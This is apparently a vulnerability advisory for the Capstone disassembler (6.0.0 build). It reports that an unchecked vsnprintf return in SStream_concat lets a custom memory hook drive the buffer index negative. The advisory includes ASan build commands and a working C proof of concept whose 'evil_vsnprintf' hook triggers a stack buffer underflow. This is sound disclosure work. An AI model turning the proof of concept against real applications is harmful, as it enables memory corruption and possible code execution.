Summary

Unchecked vsnprintf return in SStream_concat lets a malicious cs_opt_mem.vsnprintf drive SStream’s index negative or past the end, leading to a stack
buffer underflow/overflow when the next write occurs.

Details

• Vulnerable path: SStream_concat adds ret from cs_vsnprintf directly to ss->index without validating that it is non-negative and within remaining buffer
  space (SStream.c:227-244). A negative return underflows index; an oversized return skips overflow checks.
• Subsequent writes in SStream_concat1 use the corrupted index, writing before or beyond ss->buffer (stack-allocated), corrupting stack memory.
• The vsnprintf hook is attacker-controlled via cs_option(CS_OPT_MEM) (include/capstone/capstone.h:280-290, cs.c:1037). Any embedding that allows
  untrusted code to install a custom cs_opt_mem can be exploited.
• Affected build tested: git describe → 6.0.0-Alpha5-34-g9a0a1607 (Capstone 6.0.0 build).

PoC

Reproduces stack buffer overflow with AddressSanitizer on macOS (AppleClang 17):

Build ASan-instrumented library

cmake -B build-asan -DCMAKE_BUILD_TYPE=Debug
-DCMAKE_C_FLAGS="-fsanitize=address -fno-omit-frame-pointer"
-DCMAKE_SHARED_LINKER_FLAGS="-fsanitize=address"
-DCMAKE_EXE_LINKER_FLAGS="-fsanitize=address"
cmake --build build-asan -j4

PoC (uses custom vsnprintf returning -1)

  cat > poc_sstream.c <<'EOF'
  #include <capstone/capstone.h>
  #include <stdio.h>
  #include <stdlib.h>
  #include "SStream.h"

  static int evil_vsnprintf(char *str, size_t size, const char *fmt, va_list ap)
  {
      (void)str; (void)size; (void)fmt; (void)ap;
      return -1; // forces index underflow
  }

  int main(void)
  {
      cs_opt_mem mem = { .malloc = malloc, .calloc = calloc, .realloc = realloc,
                         .free = free, .vsnprintf = evil_vsnprintf };
      cs_option(0, CS_OPT_MEM, (size_t)&mem);

      SStream ss;
      SStream_Init(&ss);
      SStream_concat(&ss, "%s", "AAAA"); // index += -1
      SStream_concat1(&ss, 'B');         // writes before buffer => crash/ASan hit
      return 0;
  }
  EOF

clang -fsanitize=address -Iinclude poc_sstream.c build-asan/libcapstone.a -o poc_sstream
ASAN_OPTIONS=halt_on_error=0:abort_on_error=0 ./poc_sstream

ASan reports stack-buffer-overflow in SStream_concat1.

Impact

• Vulnerability: Stack buffer underflow/overflow leading to memory corruption and potential code execution in the process using Capstone.
• Who is impacted: Applications that let untrusted plugins/scripts set cs_option(CS_OPT_MEM) (or otherwise control cs_vsnprintf) while using SStream (all
  printers). Not reachable by mere untrusted input alone; requires the ability to set Capstone’s memory hooks.